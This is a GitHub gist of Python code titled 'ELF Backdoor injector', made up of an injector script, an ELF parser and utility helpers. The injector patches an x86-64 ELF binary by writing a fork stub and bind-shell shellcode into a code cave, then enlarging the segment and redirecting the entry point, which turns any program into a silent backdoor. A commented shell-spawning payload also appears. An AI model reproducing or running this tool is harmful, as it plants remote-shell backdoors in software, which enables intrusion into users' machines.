Created
August 28, 2022 06:57
-
-
Save suzuke/d23a8db3c802de9f9a541240ad54b526 to your computer and use it in GitHub Desktop.
ELF Backdoor injector
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
from utils import parse_args | |
from parse import elf_info | |
from struct import pack | |
import logging | |
logger = logging.getLogger(__name__) | |
logging.basicConfig(level=logging.NOTSET) | |
class injector: | |
def __init__(self, file, inject_code: bytes): | |
self.file = file | |
self.info = elf_info(self.file) | |
code = b''.join([b'\x6a\x39', # push 0x39 | |
b'\x58', # pop rax | |
b'\x0f\x05', # syscall | |
b'\x48\x85\xc0', # test rax, rax | |
b'\x74\x0c', # je 0x16 | |
# movabs rbp, entry | |
b'\x48\xbd' + pack('<Q', self.info.header['e_entry']), | |
b'\xff\xe5', # jmp rbp | |
inject_code]) # inject code | |
segs = self.find_cave(len(code)) | |
if len(segs) == 0: | |
logger.error('No cave in the program') | |
return | |
target_idx = segs[0]['index'] | |
target = self.info.segments[target_idx] | |
code_offset = target['p_offset'] + target['p_filesz'] | |
logger.info(f'Writing code to 0x{code_offset:x}') | |
self.add_machine_code(code_offset, code) | |
new_size = target['p_filesz'] + len(code) | |
logger.info(f'Writing file/mem size to 0x{new_size:x}') | |
self.extend_seg_size(target_idx, new_size) | |
code_va = target['p_vaddr'] + target['p_filesz'] | |
logger.info(f'Writing entry to 0x{code_va:x}') | |
self.modify_entry(code_va) | |
def verify_cave(self, start: int, len_: int) -> int: | |
''' | |
Walking through file to verlify cave's size | |
''' | |
self.file.seek(start) | |
count = 0 | |
while self.file.tell() < start + len_: | |
b = self.file.read(1) | |
if b == b'\x00': | |
count += 1 | |
else: | |
break | |
return count | |
def find_cave(self, need_size: int): | |
''' | |
Find the cave in LOAD, exec segment | |
cave means segment's file size is smaller than alloc size | |
''' | |
load_segs = list(filter(lambda x: x['p_type'] == 1, | |
self.info.segments)) | |
if len(load_segs) <= 0: | |
exit(1) | |
cave_segs = [] | |
for i in range(len(load_segs) - 1): | |
c_seg = load_segs[i] | |
n_seg = load_segs[i + 1] | |
# Not a LOAD segments | |
if not c_seg['p_flags'] & 1: | |
continue | |
# First verify | |
max_range = c_seg['p_filesz'] + c_seg['p_vaddr'] | |
if max_range >= n_seg['p_vaddr']: | |
continue | |
real_size = self.verify_cave(c_seg['p_offset'] + c_seg['p_filesz'], | |
n_seg['p_vaddr'] - max_range) | |
# cave size is too small | |
if real_size <= need_size: | |
continue | |
logger.info(f'Found a {real_size} bytes cave') | |
cave_segs.append({'index': self.info.segments.index(c_seg), | |
'cave_size': real_size}) | |
return cave_segs | |
def extend_seg_size(self, seg_pos: int, new_size: int): | |
''' | |
Patch segment to increase LOAD file size | |
''' | |
file_pos = self.info.header['e_phoff'] + \ | |
seg_pos * self.info.header['e_phentsize'] | |
if self.info.header['e_machine'] == 62: | |
file_pos += 32 | |
# TODO: abstract elf types to adapt more architectures | |
else: | |
pass | |
self.file.seek(file_pos) | |
# TODO: static pack size | |
self.file.write(pack('<Q', new_size) * 2) | |
def add_machine_code(self, pos: int, code: bytes): | |
''' | |
Add code in the increased LOAD segments | |
''' | |
self.file.seek(pos) | |
self.file.write(code) | |
def modify_entry(self, new_entry: int): | |
self.file.seek(24) | |
self.file.write(pack('<Q', new_entry)) | |
if __name__ == "__main__": | |
''' | |
# NOP Test | |
code = b'\x90\x90\x90' | |
# spawn a shell | |
code = b'\x48\x31\xf6\x56' | |
code += b'\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68' | |
code += b'\x57\x54\x5f\x6a\x3b\x58\x99\x0f\x05' | |
''' | |
# Bind shell: <https://www.exploit-db.com/shellcodes/41128> | |
code = b"\x48\x31\xc0\x48\x31\xd2\x48\x31\xf6\xff\xc6\x6a\x29\x58\x6a\x02" | |
code += b"\x5f\x0f\x05\x48\x97\x6a\x02\x66\xc7\x44\x24\x02\x15\xe0" | |
code += b"\x54\x5e\x52\x6a\x31\x58\x6a\x10\x5a\x0f\x05\x5e\x6a\x32\x58" | |
code += b"\x0f\x05" | |
code += b"\x6a\x2b\x58\x0f\x05\x48\x97\x6a\x03\x5e\xff\xce\xb0\x21\x0f\x05" | |
code += b"\x75\xf8\xf7\xe6\x52\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68" | |
code += b"\x53\x48\x8d\x3c\x24\xb0\x3b\x0f\x05" | |
args = parse_args() | |
if args.file: | |
with open(args.file, 'rb+') as f: | |
injector(f, code) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
''' | |
[ELF Document](https://uclibc.org/docs/elf-64-gen.pdf) | |
''' | |
from utils import parse_args, debug_print | |
from struct import unpack | |
from typing import List, Dict, BinaryIO, Union, Any | |
Header = Dict[str, Any] | |
Segments = List[Dict[str, int]] | |
Sections = List[Dict[str, Union[int, str]]] | |
class elf_info: | |
''' | |
This class will parse ELF file and get information from ELF file. | |
''' | |
def __init__(self, file: BinaryIO): | |
self.file = file | |
self.header = self._parse_header() | |
self.segments = self._parse_segment() | |
self.sections = self._parse_section() | |
self._add_section_name() | |
def _parse_header(self) -> Header: | |
''' | |
header parse part. | |
''' | |
hdr = {} | |
hdr['e_ident'] = unpack('4sccccc6sc', self.file.read(16)) | |
hdr['e_type'], hdr['e_machine'] = unpack('<hh', self.file.read(4)) | |
hdr['e_version'], = unpack('<I', self.file.read(4)) | |
# Entry point virtual address | |
hdr['e_entry'], = unpack('<Q', self.file.read(8)) | |
# segment/section header file offset | |
hdr['e_phoff'], hdr['e_shoff'] = unpack('<QQ', self.file.read(16)) | |
# Processor-specific flags, ELF Header size in bytes | |
hdr['e_flags'], hdr['e_ehsize'] = unpack('<Ih', self.file.read(6)) | |
# Program header table entry size, Program header table entry count | |
hdr['e_phentsize'], hdr['e_phnum'] = unpack('<hh', self.file.read(4)) | |
# Section header table entry size, Section header table entry count | |
hdr['e_shentsize'], hdr['e_shnum'] = unpack('<hh', self.file.read(4)) | |
# Section header string table index | |
hdr['e_shtrndx'], = unpack('<h', self.file.read(2)) | |
return hdr | |
def _parse_segment(self) -> Segments: | |
''' | |
segment/program header parse part. | |
''' | |
self.file.seek(self.header['e_phoff']) | |
segments = [] | |
for i in range(self.header['e_phnum']): | |
seg = {} | |
# Type of segment, Segment attributes | |
seg['p_type'], seg['p_flags'] = unpack('<II', self.file.read(8)) | |
# Offset in file | |
seg['p_offset'], = unpack('<Q', self.file.read(8)) | |
# Virtual address in memory, Reserved | |
seg['p_vaddr'], seg['p_paddr'] = unpack('<QQ', self.file.read(16)) | |
# Size of segment in file, Size of segment in memory | |
seg['p_filesz'], seg['p_memsz'] = unpack('<QQ', self.file.read(16)) | |
# Alignment of segment | |
seg['p_align'], = unpack('<Q', self.file.read(8)) | |
segments.append(seg) | |
return segments | |
def _add_section_name(self): | |
''' | |
After section parsing, | |
this class will use ELF header's e_shtrndx to get shstrtab's position | |
and get other sections' name. | |
''' | |
# use session string index to get session string's file offset | |
shstrtab_offset = self.sections[self.header['e_shtrndx']]['sh_offset'] | |
for j in self.sections: | |
# use file offset to get section name | |
assert isinstance(shstrtab_offset, int) and \ | |
isinstance(j['sh_name'], int) | |
self.file.seek(shstrtab_offset + j['sh_name']) | |
s_name_str = '' | |
while True: | |
t = self.file.read(1) | |
if t == b'\x00': | |
break | |
s_name_str += t.decode() | |
j['s_name_str'] = s_name_str | |
def _parse_section(self) -> Sections: | |
''' | |
section parse part. | |
''' | |
self.file.seek(self.header['e_shoff']) | |
sections = [] | |
for i in range(self.header['e_shnum']): | |
sec = {} | |
# Section name and type | |
sec['sh_name'], sec['sh_type'] = unpack('<II', self.file.read(8)) | |
# Section attributes | |
sec['sh_flags'], = unpack('<Q', self.file.read(8)) | |
# Virtual address in memory, Offset in file | |
sec['sh_addr'], sec['sh_offset'] = unpack('QQ', self.file.read(16)) | |
# Size of section | |
sec['sh_size'], = unpack('<Q', self.file.read(8)) | |
# Link to other section Miscellaneous information | |
sec['sh_link'], sec['sh_info'] = unpack('<II', self.file.read(8)) | |
# Address alignment boundary, Size of entries, if section has table | |
sec['sh_addralign'], sec['sh_entsize'] = unpack( | |
'QQ', self.file.read(16)) | |
sections.append(sec) | |
return sections | |
def analyse_segment(self) -> Dict[int, List[str]]: | |
''' | |
Analyse the sessions and segment's relation | |
''' | |
dic: Dict[int, List[str]] = {} | |
for i in range(len(self.segments)): | |
dic[i] = [] | |
for sec in self.sections: | |
assert isinstance(sec['sh_addr'], int) and \ | |
isinstance(sec['sh_size'], int) | |
sec_begin = sec['sh_addr'] | |
sec_end = sec_begin + sec['sh_size'] | |
for i, seg in enumerate(self.segments): | |
seg_begin = seg['p_vaddr'] | |
seg_end = seg_begin + seg['p_memsz'] | |
if sec_begin >= seg_begin and sec_end <= seg_end: | |
assert isinstance(sec['s_name_str'], str) | |
dic[i].append(sec['s_name_str']) | |
return dic | |
if __name__ == '__main__': | |
args = parse_args() | |
with open(args.file, 'rb') as f: | |
info = elf_info(f) | |
result = info.analyse_segment() | |
debug_print(info.header, | |
info.segments, | |
info.sections, | |
result) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
from argparse import ArgumentParser | |
from logging import getLogger, NOTSET | |
def get_logger(name: str = ''): | |
logger = getLogger(name) | |
logger.setLevel(NOTSET) | |
return logger | |
def parse_args(): | |
parser = ArgumentParser() | |
parser.add_argument('-f', '--file') | |
return parser.parse_args() | |
def print_table(lst): | |
for i in lst: | |
if isinstance(i, str): | |
if len(i) > 10: | |
i = i[:10] | |
print(f'{i:<10s} ', end='') | |
elif isinstance(i, int): | |
print(f'{i:<10x} ', end='') | |
print('') | |
def debug_print(header, | |
segments, | |
sections, | |
result): | |
print('[+] ELF Header') | |
for k, v in header.items(): | |
print(' ', f'{k} {v}') | |
print('[+] segments') | |
print_table(list(segments[0].keys())) | |
for j in segments: | |
print_table(list(j.values())) | |
print('[+] sections') | |
print_table(list(sections[1].keys())) | |
# do not use j to be a variable name, | |
# because the type of j is different to i... | |
# F-WORD mypy! | |
for i in sections: | |
print_table(list(i.values())) | |
print('[+] analyse') | |
for k, v in result.items(): | |
print(k, ' '.join(v)) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment